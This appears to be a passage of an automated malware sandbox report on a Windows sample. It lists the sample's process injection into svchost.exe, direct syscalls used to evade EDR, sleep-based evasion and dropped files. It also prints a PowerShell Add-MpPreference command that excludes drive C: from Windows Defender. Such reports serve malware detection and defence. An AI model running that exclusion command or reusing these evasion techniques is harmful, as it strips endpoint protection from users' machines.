                    Source: C:\Windows\System32\svchost.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_4-17596
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeDropped PE file which has not been started: C:\Windows\Temp\bS4Vs_8188.sysJump to dropped file
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_0-12319
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exeAPI coverage: 6.1 %
                    Source: C:\Windows\System32\svchost.exeAPI coverage: 7.5 %
                    Source: C:\Windows\System32\svchost.exe TID: 7828Thread sleep count: 46 > 30Jump to behavior
                    Source: C:\Windows\System32\svchost.exe TID: 7828Thread sleep time: -138000s >= -30000sJump to behavior
                    Source: C:\Windows\System32\svchost.exe TID: 7840Thread sleep time: -90000s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7884Thread sleep count: 6098 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7872Thread sleep count: 3681 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7952Thread sleep time: -6456360425798339s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2588Thread sleep time: -9223372036854770s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7688Thread sleep count: 5622 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2788Thread sleep count: 2190 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2288Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1368Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exeCode function: 0_2_00410B94 __snwprintf,FindFirstFileW,__snwprintf,DeleteFileW,FindNextFileW,FindClose,Sleep,GetFileAttributesW,RemoveDirectoryW,Sleep,GetFileAttributesW,RemoveDirectoryW,Sleep,0_2_00410B94
                    Source: C:\Windows\System32\svchost.exeCode function: 4_2_000001C3DDDA97F0 SHGetKnownFolderPath,lstrlenW,CoTaskMemFree,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,Sleep,GetFileAttributesW,RemoveDirectoryW,Sleep,GetFileAttributesW,RemoveDirectoryW,Sleep,4_2_000001C3DDDA97F0
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 8_2_009135CC FindFirstFileA,FindNextFileA,FindClose,8_2_009135CC
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 8_2_00931C54 __doserrno,_errno,_errno,__doserrno,FindFirstFileA,_errno,_errno,_errno,_errno,_errno,GetDriveTypeA,free,free,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,FindClose,8_2_00931C54
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 8_2_008C5BCC GetCurrentProcess,GetProcessAffinityMask,GetSystemInfo,8_2_008C5BCC
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: w32tm.exe, 0000000B.00000002.1594404005.0000000000558000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllV
                    Source: svchost.exe, 00000004.00000002.2571150204.000001C3DC413000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@vI
                    Source: svchost.exe, 00000004.00000002.2571466574.000001C3DC4CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: svchost.exe, 00000004.00000002.2571381752.000001C3DC497000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWRSVP TCPv6 Service Provider
                    Source: svchost.exe, 00000004.00000002.2571334687.000001C3DC475000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe, 00000000.00000002.1323038047.000000000072E000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000008.00000002.1564009802.00000000005A3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: svchost.exe, 00000004.00000002.2571177550.000001C3DC467000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exeAPI call chain: ExitProcess graph end nodegraph_0-12240
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exeAPI call chain: ExitProcess graph end nodegraph_0-12333
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exeAPI call chain: ExitProcess graph end nodegraph_0-12330
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exeAPI call chain: ExitProcess graph end nodegraph_0-12324
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exeAPI call chain: ExitProcess graph end nodegraph_0-12321
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exeAPI call chain: ExitProcess graph end nodegraph_0-12342
                    Source: C:\Windows\System32\svchost.exeAPI call chain: ExitProcess graph end nodegraph_4-17558
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeAPI call chain: ExitProcess graph end nodegraph_8-53758
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeAPI call chain: ExitProcess graph end nodegraph_8-54252
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeCode function: 4_2_000001C3DDDD0E94 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_000001C3DDDD0E94
                    Source: C:\Windows\System32\svchost.exeCode function: 4_2_000001C3DDDBDE00 GetCurrentProcessId,CreateToolhelp32Snapshot,Process32FirstW,CloseHandle,Process32NextW,CloseHandle,4_2_000001C3DDDBDE00
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exeCode function: 0_2_0040BCA0 WaitForSingleObject,GetLocalTime,SystemTimeToFileTime,wnsprintfW,RegDeleteKeyExW,wnsprintfW,RegDeleteKeyExW,wnsprintfW,RegDeleteKeyExW,wnsprintfW,RegDeleteKeyExW,GetFileAttributesW,SHFileOperationW,Sleep,LocalFree,__snwprintf,GetWindowsDirectoryW,__snwprintf,CreateProcessW,GetCurrentProcess,DuplicateHandle,GetCurrentProcess,DuplicateHandle,LoadLibraryW,GetProcAddress,GetProcAddress,CloseHandle,CloseHandle,TerminateProcess,LocalFree,OpenEventW,SetEvent,CloseHandle,LocalFree,0_2_0040BCA0
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 8_2_00939204 GetProcessHeap,HeapAlloc,_errno,_errno,__doserrno,_errno,GetProcessHeap,HeapFree,SetEndOfFile,_errno,__doserrno,GetLastError,8_2_00939204
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\System32\svchost.exeCode function: 4_2_000001C3DDDD0E94 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_000001C3DDDD0E94
                    Source: C:\Windows\System32\svchost.exeCode function: 4_2_000001C3DDDCE5B8 SetUnhandledExceptionFilter,4_2_000001C3DDDCE5B8
                    Source: C:\Windows\System32\svchost.exeCode function: 4_2_000001C3DDDCC5E0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_000001C3DDDCC5E0
                    Source: C:\Windows\System32\svchost.exeCode function: 4_2_000001C3DDDCA818 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_000001C3DDDCA818
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 8_2_0092C280 RtlCaptureContext,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_0092C280
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 8_2_0092C540 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_0092C540
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 8_2_00929924 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_00929924
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 8_2_00929B18 SetUnhandledExceptionFilter,8_2_00929B18

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Benign windows process drops PE files
                    Source: C:\Windows\System32\svchost.exeFile created: w32tm.exe.4.drJump to dropped file
                    Adds a directory exclusion to Windows Defender
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-MpPreference -ExclusionPath 'C:'
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:\
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-MpPreference -ExclusionPath 'C:'Jump to behavior
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:\Jump to behavior
                    Contains functionality to inject code into remote processes
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exeCode function: 0_2_00406DB0 GetCurrentProcess,CreateProcessW,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,GetThreadContext,WriteProcessMemory,SetThreadContext,ResumeThread,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,NtClose,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,CloseHandle,CloseHandle,0_2_00406DB0
                    Found direct / indirect Syscall (likely to bypass EDR)
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeNtProtectVirtualMemory: Direct from: 0x1404038C1Jump to behavior
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeNtProtectVirtualMemory: Direct from: 0x1400026B1Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exeNtProtectVirtualMemory: Direct from: 0x140248445Jump to behavior
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeNtQuerySystemInformation: Direct from: 0x140400FD6Jump to behavior
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeNtProtectVirtualMemory: Direct from: 0x14025216AJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exeNtQuerySystemInformation: Direct from: 0x14025B23FJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exeNtProtectVirtualMemory: Direct from: 0x140225E38Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exeNtQuerySystemInformation: Direct from: 0x140232AC0Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exeNtQuerySystemInformation: Direct from: 0x1402A1C00Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exeNtQuerySystemInformation: Direct from: 0x140166C45Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exeNtProtectVirtualMemory: Direct from: 0x140236AB8Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exeNtProtectVirtualMemory: Direct from: 0x1402391CEJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exeNtProtectVirtualMemory: Direct from: 0x140239FF3Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exeNtProtectVirtualMemory: Direct from: 0x1402412BCJump to behavior
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeNtProtectVirtualMemory: Direct from: 0x14030333EJump to behavior
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeNtQuerySystemInformation: Direct from: 0x140406550Jump to behavior
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeNtProtectVirtualMemory: Direct from: 0x1403036D3Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exeNtProtectVirtualMemory: Direct from: 0x140168DD1Jump to behavior
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeNtQuerySystemInformation: Direct from: 0x1402E8A85Jump to behavior
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeNtProtectVirtualMemory: Direct from: 0x1403EFCD3Jump to behavior
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeNtQuerySystemInformation: Direct from: 0x1404200BBJump to behavior
                    Maps a DLL or memory area into another process
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exeSection loaded: NULL target: C:\Windows\System32\svchost.exe protection: read writeJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exeSection loaded: NULL target: C:\Windows\System32\svchost.exe protection: execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exeSection loaded: NULL target: C:\Windows\System32\svchost.exe protection: read writeJump to behavior
                    Searches for specific processes (likely to inject)
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exeCode function: 0_2_004043D0 CreateToolhelp32Snapshot,Process32FirstW,StrCmpIW,CloseHandle,Process32NextW,CloseHandle,0_2_004043D0
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exeCode function: 0_2_004044A0 CreateToolhelp32Snapshot,Process32FirstW,StrCmpIW,CloseHandle,Process32NextW,CloseHandle,0_2_004044A0
                    Source: C:\Windows\System32\svchost.exeCode function: 4_2_000001C3DDDA42E0 CreateToolhelp32Snapshot,Process32FirstW,StrCmpIW,CloseHandle,Process32NextW,CloseHandle,4_2_000001C3DDDA42E0
                    Source: C:\Windows\System32\svchost.exeCode function: 4_2_000001C3DDDA43D0 CreateToolhelp32Snapshot,Process32FirstW,StrCmpIW,CloseHandle,Process32NextW,CloseHandle,4_2_000001C3DDDA43D0
                    Source: C:\Windows\System32\svchost.exeCode function: 4_2_000001C3DDDAA3B0 setsockopt,SetEvent,LocalAlloc,wnsprintfW,LocalAlloc,lstrcpyW,LocalAlloc,lstrcpyW,CoInitializeEx,ShellExecuteExW,GetLastError,CoUninitialize,LocalAlloc,wnsprintfW,CreateProcessW,OpenEventW,SetEvent,CloseHandle,LocalFree,LocalFree,OpenEventW,SetEvent,CloseHandle,LocalFree,LocalFree,LocalFree,LocalFree,shutdown,closesocket,4_2_000001C3DDDAA3B0
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\system32\svchost.exe"Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-MpPreference -ExclusionPath 'C:'Jump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\set.bat" """Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exeCode function: 0_2_0040CF50 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,LocalFree,0_2_0040CF50
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exeCode function: 0_2_0041D480 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_0041D480
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: GetLocaleInfoA,8_2_0092E5E8
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
